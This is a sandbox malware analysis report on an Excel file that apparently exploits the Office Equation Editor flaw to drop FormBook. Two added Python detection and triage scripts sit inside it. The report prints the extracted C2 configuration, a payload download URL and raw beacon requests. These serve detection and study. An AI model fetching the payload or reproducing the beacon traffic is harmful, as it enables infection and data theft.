Windows Analysis Report SWIFT - Copy - Copy.xlsx

Overview

General Information

Sample Name: SWIFT - Copy - Copy.xlsx
Analysis ID: 553293
MD5: 338cbe8a882d7c941afe2cf895055bd5
SHA1: f081a9d12054b2e1a59d3eae4fa65059db634268
SHA256: 097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
Tags: xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}
Yara detected FormBook
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://mikeloayza.com/E9/i4L.exe Avira URL Cloud: Label: malware
Source: https://mikeloayza.com/E9/i4L.exe Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: SWIFT - Copy - Copy.xlsx Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Pcportk28.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.Pcportk28.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\Pcportk28.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
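The EQNEDT32.EXE-centred Sigma hits in the signature list (EQNEDT32.EXE connecting to internet, Droppers Exploiting CVE-2017-11882, File Dropped By EQNEDT32EXE) and the "System process connects to network" hit all reduce to parent/child, file-write and outbound-connection checks on process telemetry: the Equation Editor is a COM server that has no business spawning children, writing executables or talking to the network, and neither does explorer.exe once FormBook has injected into it. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule set: it encodes those checks and runs them over Sysmon-style event records constructed from the behaviour lines of this report (the EXCEL.EXE temp-file event is invented as a benign control).

```python
"""Endpoint-telemetry checks mirroring the EQNEDT32.EXE / system-process
Sigma hits in this report. Added example; the event records are
constructed from the report's behaviour lines, not exported from the sandbox."""
from __future__ import annotations
from dataclasses import dataclass

EQNEDT32 = r"c:\program files\common files\microsoft shared\equation\eqnedt32.exe"

# Processes with no legitimate reason to initiate outbound connections on a
# workstation; FormBook injects into explorer.exe and a spawned wininit.exe.
SYSTEM_PROCESSES = {
    r"c:\windows\explorer.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\syswow64\wininit.exe",
}

# User-writable locations where a benign Office helper should never place a PE.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "\\appdata\\local\\", "\\appdata\\roaming\\")


@dataclass
class Event:
    kind: str            # "process_create" | "file_create" | "network_connect"
    image: str           # the process created (process_create) or acting (other kinds)
    parent: str = ""     # parent image (process_create only)
    target: str = ""     # created file path or remote address
    port: int = 0        # remote port (network_connect only)


def _in_suspicious_dir(path: str) -> bool:
    p = path.lower()
    return any(d in p for d in SUSPICIOUS_DIRS)


def evaluate(ev: Event) -> list[str]:
    """Return the rule names the event matches; an empty list means no hit."""
    hits: list[str] = []
    image = ev.image.lower()
    if ev.kind == "process_create":
        if ev.parent.lower() == EQNEDT32:
            # Equation Editor spawning anything is exploit fallout (CVE-2017-11882 / CVE-2018-0802).
            hits.append("eqnedt32_child_process")
            if _in_suspicious_dir(ev.image):
                hits.append("execution_from_suspicious_folder")
    elif ev.kind == "file_create":
        if image == EQNEDT32:
            hits.append("eqnedt32_file_drop")
            if ev.target.lower().endswith((".exe", ".dll", ".scr")):
                hits.append("eqnedt32_pe_drop")
    elif ev.kind == "network_connect":
        if image == EQNEDT32:
            hits.append("eqnedt32_network")
        elif image in SYSTEM_PROCESSES:
            hits.append("system_process_network")
    return hits


def triage(events: list[Event]) -> list[tuple[Event, list[str]]]:
    """Keep only the events that matched at least one rule."""
    return [(ev, h) for ev in events if (h := evaluate(ev))]


EQ_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed from the report's behaviour lines; paths and hosts as observed there.
SAMPLE_EVENTS = [
    Event("process_create", EQ_PATH, parent="unknown"),                    # COM launch of the editor itself
    Event("network_connect", EQ_PATH, target="mikeloayza.com", port=80),   # stage-one download
    Event("file_create", EQ_PATH,
          target=r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe"),
    Event("file_create", EQ_PATH, target=r"C:\Users\Public\Pcportk28.exe"),
    Event("process_create", r"C:\Users\Public\Pcportk28.exe", parent=EQ_PATH),
    Event("network_connect", r"C:\Windows\explorer.exe", target="162.0.209.73", port=80),
    Event("file_create", r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
          target=r"C:\Users\user\AppData\Local\Temp\~DF1234.tmp"),        # invented benign control
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(f"{ev.kind:16} {ev.image.rsplit(chr(92), 1)[-1]:16} -> {', '.join(hits)}")
```

Five of the seven constructed events fire; the COM launch of EQNEDT32.EXE itself and the Excel temp file do not, which is the point: the editor starting is normal when a document embeds an equation object, what it does afterwards is not.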

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mikeloayza.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\Pcportk28.exe Code function: 4x nop then pop ebx 5_2_00406AB6
Source: C:\Users\Public\Pcportk28.exe Code function: 4x nop then pop edi 5_2_0040C3FB
Source: C:\Users\Public\Pcportk28.exe Code function: 4x nop then pop edi 5_2_0041565B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 7_2_000EC3FB
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop edi 7_2_000F565B
Source: C:\Windows\SysWOW64\wininit.exe Code function: 4x nop then pop ebx 7_2_000E6AB6
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 131.153.37.4:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 131.153.37.4:443

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe Network Connect: 162.0.209.73 80
Source: C:\Windows\explorer.exe Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe Network Connect: 118.67.131.217 80
Source: C:\Windows\explorer.exe Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe Network Connect: 216.239.34.21 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.healingandhealthy.com/i6ro/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ACPCA
Source: Joe Sandbox View ASN Name: CLEAR-AS-APClearNetworksPtyLtdAU
Source: Joe Sandbox View ASN Name: SSASN2US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.fisioletsgo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic HTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.bitcointradel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic HTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.executive-air.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
Source: global traffic HTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.luckyfandom.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none)
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 118.67.131.217
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Connection: Keep-Alive | Host: mikeloayza.com
Source: global traffic HTTP traffic detected: GET /E9/i4L.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: mikeloayza.com | Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Fri, 14 Jan 2022 15:06:04 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "618be761-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
Source: unknown DNS traffic detected: queries for: mikeloayza.com
Source: unknown HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2
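The configuration extractor output above lists one C2 URL and 63 decoy domains, and every host the injected explorer.exe was seen querying (www.executive-air.net, www.bitcointradel.com, www.freeadakahamazon.com, www.fisioletsgo.com, www.luckyfandom.com) is on the decoy list; the configured C2 host www.healingandhealthy.com does not appear in the captured traffic at all. The GETs to those decoys share the C2 path /i6ro/, two opaque query parameters, no User-Agent and Connection: close, whereas the stage-one download of i4L.exe from mikeloayza.com by EQNEDT32.EXE carries a browser User-Agent and Keep-Alive. The Python below is an added example, not part of the report: it transcribes the configuration (decoy list abridged to a handful of entries), the observed queries and two captured requests with CRLFs restored, and then checks which observed hosts are decoys versus the real C2 and which requests have the beacon shape. The only assumption beyond the report is that decoys are matched with the leading "www." stripped, since the configuration lists them without it and the observed queries carry it.

```python
"""Network-indicator triage for this report against the extracted FormBook
configuration. Added example: config, domain queries and requests are
transcribed from the report (decoy list abridged); the logic is the editor's."""
from __future__ import annotations
from urllib.parse import parse_qs, urlsplit

# From the malware configuration extractor output; decoys abridged.
CONFIG = {
    "C2 list": ["www.healingandhealthy.com/i6ro/"],
    "decoy": ["annahve.xyz", "636851.com", "executive-air.net", "bitcointradel.com",
              "freeadakahamazon.com", "fisioletsgo.com", "luckyfandom.com", "xiexingyu.top"],
}

# Domain queries the report attributes to the injected explorer.exe.
OBSERVED_QUERIES = ["www.executive-air.net", "www.bitcointradel.com",
                    "www.freeadakahamazon.com", "www.fisioletsgo.com", "www.luckyfandom.com"]

# First decoy GET from the report, CRLFs restored, seven-null-byte body as shown in Data Raw.
BEACON_REQUEST = (
    b"GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg=="
    b"&Lvkth=7nk0PH684p HTTP/1.1\r\nHost: www.fisioletsgo.com\r\nConnection: close\r\n\r\n"
    + b"\x00" * 7
)

# Stage-one download issued by EQNEDT32.EXE (User-Agent shortened from the report).
DOWNLOAD_REQUEST = (
    b"GET /E9/i4L.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
    b"Connection: Keep-Alive\r\nHost: mikeloayza.com\r\n\r\n"
)


def _bare(host: str) -> str:
    """Normalise a host for comparison: lower-case, no trailing dot, no leading 'www.' (assumption)."""
    h = host.strip().lower().rstrip(".")
    return h[4:] if h.startswith("www.") else h


def c2_endpoints(config: dict) -> list[tuple[str, str]]:
    """Split 'host/path/' C2 entries into (bare host, path)."""
    out = []
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out.append((_bare(host), "/" + path))
    return out


def classify_host(host: str, config: dict) -> str:
    bare = _bare(host)
    if bare in {h for h, _ in c2_endpoints(config)}:
        return "c2"
    if bare in {_bare(d) for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers (lower-cased names), body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "query": parse_qs(url.query, keep_blank_values=True),   # values are opaque; only keys matter here
            "headers": headers, "body": body}


def classify_request(req: dict, config: dict) -> dict:
    """Beacon shape seen in this report: GET to the configured C2 path, exactly two
    query parameters, no User-Agent header, Connection: close."""
    host = req["headers"].get("host", "")
    paths = {p for _, p in c2_endpoints(config)}
    beacon = (req["method"] == "GET" and req["path"] in paths
              and len(req["query"]) == 2
              and "user-agent" not in req["headers"]
              and req["headers"].get("connection", "").lower() == "close")
    return {"host": host, "host_class": classify_host(host, config), "beacon_shape": beacon}


def summarize(domains: list[str], config: dict) -> dict:
    """Bucket observed domains; c2_seen says whether the captured traffic covers the real C2."""
    buckets: dict[str, list[str]] = {"c2": [], "decoy": [], "unknown": []}
    for d in domains:
        buckets[classify_host(d, config)].append(d)
    return {**buckets, "c2_seen": bool(buckets["c2"]),
            "c2_hosts": [h for h, _ in c2_endpoints(config)]}


if __name__ == "__main__":
    print(summarize(OBSERVED_QUERIES, CONFIG))
    for raw in (BEACON_REQUEST, DOWNLOAD_REQUEST):
        print(classify_request(parse_request(raw), CONFIG))
```

The decoys are worth blocking, but the indicator to pivot on is the C2 entry from the configuration: a blocklist built only from the DNS queries and GETs the sandbox captured would not cover www.healingandhealthy.com, and the beacon-shape check flags the decoy requests and the real one alike because they differ only in the Host header.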

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
